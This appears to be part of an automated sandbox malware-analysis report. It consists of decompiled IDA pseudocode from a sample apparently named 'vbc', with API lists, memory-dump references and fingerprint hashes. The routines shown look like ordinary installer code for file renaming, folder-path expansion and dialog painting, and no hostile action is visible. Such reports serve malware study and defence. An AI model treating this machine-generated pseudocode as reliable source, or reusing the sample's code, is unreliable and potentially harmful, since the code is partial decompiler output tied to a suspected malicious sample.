                                                				WCHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x430908 = 0x55004e;
                                                				 *0x43090c = 0x4c;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                						_t53 = _t52 + 0x10;
                                                						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E004060DF(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E0040602D(_t44, 0, 1));
                                                					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}



















                                                0x00406183
                                                0x0040618c
                                                0x00406193
                                                0x0040619d
                                                0x004061b1
                                                0x004061d9
                                                0x004061e4
                                                0x004061e8
                                                0x00406208
                                                0x0040620f
                                                0x00406219
                                                0x00406226
                                                0x0040622b
                                                0x00406230
                                                0x00406234
                                                0x00406243
                                                0x00406245
                                                0x00406252
                                                0x00406256
                                                0x004062f1
                                                0x00000000
                                                0x0040626c
                                                0x00406279
                                                0x0040629d
                                                0x004062a1
                                                0x004062c0
                                                0x004062c4
                                                0x004062c4
                                                0x004062c6
                                                0x004062cf
                                                0x004062da
                                                0x004062e5
                                                0x004062eb
                                                0x00000000
                                                0x004062eb
                                                0x004062a3
                                                0x004062a6
                                                0x004062b1
                                                0x004062ad
                                                0x004062af
                                                0x004062b0
                                                0x004062b0
                                                0x004062b8
                                                0x004062ba
                                                0x00000000
                                                0x004062ba
                                                0x00406284
                                                0x0040628a
                                                0x00000000
                                                0x0040628a
                                                0x00406256
                                                0x00406234
                                                0x004061b3
                                                0x004061be
                                                0x004061c7
                                                0x004061cb
                                                0x00000000
                                                0x00000000
                                                0x004061cb
                                                0x004062fc

                                                APIs
                                                • CloseHandle.KERNEL32(00000000), ref: 004061BE
                                                • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                • wsprintfA.USER32 ref: 00406202
                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                • CloseHandle.KERNEL32(00000000), ref: 004062F2
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t44;
                                                				WCHAR* _t45;
                                                				signed char _t47;
                                                				signed int _t48;
                                                				short _t59;
                                                				short _t61;
                                                				short _t63;
                                                				void* _t71;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				short _t81;
                                                				short _t82;
                                                				signed char _t84;
                                                				signed int _t85;
                                                				void* _t98;
                                                				void* _t104;
                                                				intOrPtr* _t105;
                                                				void* _t107;
                                                				WCHAR* _t108;
                                                				void* _t110;
                                                
                                                				_t107 = __esi;
                                                				_t104 = __edi;
                                                				_t71 = __ebx;
                                                				_t44 = _a8;
                                                				if(_t44 < 0) {
                                                					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                				}
                                                				_push(_t71);
                                                				_push(_t107);
                                                				_push(_t104);
                                                				_t105 =  *0x434f38 + _t44 * 2;
                                                				_t45 = 0x432ea0;
                                                				_t108 = 0x432ea0;
                                                				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                					_t108 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				_t81 =  *_t105;
                                                				_a8 = _t81;
                                                				if(_t81 == 0) {
                                                					L43:
                                                					 *_t108 =  *_t108 & 0x00000000;
                                                					if(_a4 == 0) {
                                                						return _t45;
                                                					}
                                                					return E0040653D(_a4, _t45);
                                                				} else {
                                                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                						_t98 = 2;
                                                						_t105 = _t105 + _t98;
                                                						if(_t81 >= 4) {
                                                							if(__eflags != 0) {
                                                								 *_t108 = _t81;
                                                								_t108 = _t108 + _t98;
                                                								__eflags = _t108;
                                                							} else {
                                                								 *_t108 =  *_t105;
                                                								_t108 = _t108 + _t98;
                                                								_t105 = _t105 + _t98;
                                                							}
                                                							L42:
                                                							_t82 =  *_t105;
                                                							_a8 = _t82;
                                                							if(_t82 != 0) {
                                                								_t81 = _a8;
                                                								continue;
                                                							}
                                                							goto L43;
                                                						}
                                                						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                						_t47 =  *_t105;
                                                						_t48 = _t47 & 0x000000ff;
                                                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                						_t85 = _t84 & 0x000000ff;
                                                						_v28 = _t48 | 0x00008000;
                                                						_t77 = 2;
                                                						_v16 = _t85;
                                                						_t105 = _t105 + _t77;
                                                						_v24 = _t48;
                                                						_v20 = _t85 | 0x00008000;
                                                						if(_a8 != _t77) {
                                                							__eflags = _a8 - 3;
                                                							if(_a8 != 3) {
                                                								__eflags = _a8 - 1;
                                                								if(__eflags == 0) {
                                                									__eflags = (_t48 | 0xffffffff) - _v12;
                                                									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                								}
                                                								L38:
                                                								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                								_t45 = 0x432ea0;
                                                								goto L42;
                                                							}
                                                							_t78 = _v12;
                                                							__eflags = _t78 - 0x1d;
                                                							if(_t78 != 0x1d) {
                                                								__eflags = (_t78 << 0xb) + 0x436000;
                                                								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                							} else {
                                                								E00406484(_t108,  *0x434f08);
                                                							}
                                                							__eflags = _t78 + 0xffffffeb - 7;
                                                							if(__eflags < 0) {
                                                								L29:
                                                								E004067C4(_t108);
                                                							}
                                                							goto L38;
                                                						}
                                                						if( *0x434f84 != 0) {
                                                							_t77 = 4;
                                                						}
                                                						_t121 = _t48;
                                                						if(_t48 >= 0) {
                                                							__eflags = _t48 - 0x25;
                                                							if(_t48 != 0x25) {
                                                								__eflags = _t48 - 0x24;
                                                								if(_t48 == 0x24) {
                                                									GetWindowsDirectoryW(_t108, 0x400);
                                                									_t77 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										goto L26;
                                                									}
                                                									_t59 =  *0x434f04;
                                                									_t77 = _t77 - 1;
                                                									__eflags = _t59;
                                                									if(_t59 == 0) {
                                                										L22:
                                                										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                										__eflags = _t61;
                                                										if(_t61 != 0) {
                                                											L24:
                                                											 *_t108 =  *_t108 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                										_a8 = _t61;
                                                										__imp__CoTaskMemFree(_v8);
                                                										__eflags = _a8;
                                                										if(_a8 != 0) {
                                                											goto L26;
                                                										}
                                                										goto L24;
                                                									}
                                                									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                									__eflags = _t63;
                                                									if(_t63 == 0) {
                                                										goto L26;
                                                									}
                                                									goto L22;
                                                								}
                                                								goto L26;
                                                							}
                                                							GetSystemDirectoryW(_t108, 0x400);
                                                							goto L26;
                                                						} else {
                                                							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                							if( *_t108 != 0) {
                                                								L27:
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L29;
                                                							}
                                                							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                							L26:
                                                							if( *_t108 == 0) {
                                                								goto L29;
                                                							}
                                                							goto L27;
                                                						}
                                                					}
                                                					goto L43;
                                                				}
                                                			}





























                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x00406580
                                                0x00406585
                                                0x00406596
                                                0x00406596
                                                0x0040659e
                                                0x0040659f
                                                0x004065a0
                                                0x004065a1
                                                0x004065a4
                                                0x004065ac
                                                0x004065ae
                                                0x004065bf
                                                0x004065c2
                                                0x004065c2
                                                0x004065c6
                                                0x004065cc
                                                0x004065cf
                                                0x004067aa
                                                0x004067aa
                                                0x004067b5
                                                0x004067c1
                                                0x004067c1
                                                0x00000000
                                                0x004065d5
                                                0x004065da
                                                0x004065ef
                                                0x004065f0
                                                0x004065f6
                                                0x00406788
                                                0x00406796
                                                0x00406799
                                                0x00406799
                                                0x0040678a
                                                0x0040678d
                                                0x00406790
                                                0x00406792
                                                0x00406792
                                                0x0040679b
                                                0x0040679b
                                                0x004067a1
                                                0x004067a4
                                                0x004065d7
                                                0x00000000
                                                0x004065d7
                                                0x00000000
                                                0x004067a4
                                                0x004065fc
                                                0x004065ff
                                                0x0040660e
                                                0x00406615
                                                0x00406621
                                                0x00406624
                                                0x00406627
                                                0x00406628
                                                0x0040662d
                                                0x00406633
                                                0x00406636
                                                0x00406639
                                                0x0040672c
                                                0x00406731
                                                0x00406764
                                                0x00406769
                                                0x0040676e
                                                0x00406773
                                                0x00406773
                                                0x00406778
                                                0x0040677e
                                                0x00406781
                                                0x00000000
                                                0x00406781
                                                0x00406733
                                                0x00406736
                                                0x00406739
                                                0x0040674e
                                                0x00406755
                                                0x0040673b
                                                0x00406742
                                                0x00406742
                                                0x0040675d
                                                0x00406760
                                                0x00406724
                                                0x00406725
                                                0x00406725
                                                0x00000000
                                                0x00406760
                                                0x00406646
                                                0x0040664a
                                                0x0040664a
                                                0x0040664b
                                                0x0040664d
                                                0x0040668a
                                                0x0040668d
                                                0x0040669d
                                                0x004066a0
                                                0x004066a8
                                                0x004066ae
                                                0x004066ae
                                                0x00406709
                                                0x00406709
                                                0x0040670b
                                                0x00000000
                                                0x00000000
                                                0x004066b2
                                                0x004066b7
                                                0x004066b8
                                                0x004066ba
                                                0x004066d1
                                                0x004066df
                                                0x004066e5
                                                0x004066e7
                                                0x00406705
                                                0x00406705
                                                0x00406705
                                                0x00000000
                                                0x00406705
                                                0x004066ed
                                                0x004066f6
                                                0x004066f9
                                                0x004066ff
                                                0x00406703
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406703
                                                0x004066cb
                                                0x004066cd
                                                0x004066cf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066cf
                                                0x00000000
                                                0x00406709
                                                0x00406695
                                                0x00000000
                                                0x0040664f
                                                0x0040666d
                                                0x00406676
                                                0x00406713
                                                0x00406717
                                                0x0040671f
                                                0x0040671f
                                                0x00000000
                                                0x00406717
                                                0x00406680
                                                0x0040670d
                                                0x00406711
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406711
                                                0x0040664d
                                                0x00000000
                                                0x004065da

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00000000,00425A20,74EC110C), ref: 004066A8
                                                • lstrcatW.KERNEL32 ref: 0040671F
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-2905448973
                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}









                                                0x00404512
                                                0x004045c8
                                                0x00000000
                                                0x004045c8
                                                0x00404523
                                                0x00404527
                                                0x00000000
                                                0x00404541
                                                0x00404541
                                                0x0040454a
                                                0x00000000
                                                0x00000000
                                                0x0040454c
                                                0x00404558
                                                0x0040455b
                                                0x0040455b
                                                0x00404561
                                                0x00404567
                                                0x00404567
                                                0x00404573
                                                0x00404579
                                                0x00404580
                                                0x00404583
                                                0x00404586
                                                0x00404588
                                                0x00404588
                                                0x00404590
                                                0x00404596
                                                0x00404596
                                                0x004045a0
                                                0x004045a5
                                                0x004045a8
                                                0x004045ad
                                                0x004045b0
                                                0x004045b0
                                                0x004045c0
                                                0x004045c0
                                                0x00000000
                                                0x004045c3

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                				_t66 = E00402D84(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x44) = 0x3ff;
                                                					}
                                                					if( *__edi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x38) = __ebx;
                                                						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                						if( *(__ebp - 0x44) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                										__eax = __ebp - 0x50;
                                                										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x4c) = __ecx;
                                                											 *(__ebp - 0x50) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x50 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x50);
                                                												} else {
                                                													__edi =  *(__ebp - 0x4c);
                                                													__edi =  ~( *(__ebp - 0x4c));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x50) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                														__edi = __edi + 1;
                                                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                														__eax = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x38) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027bc
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
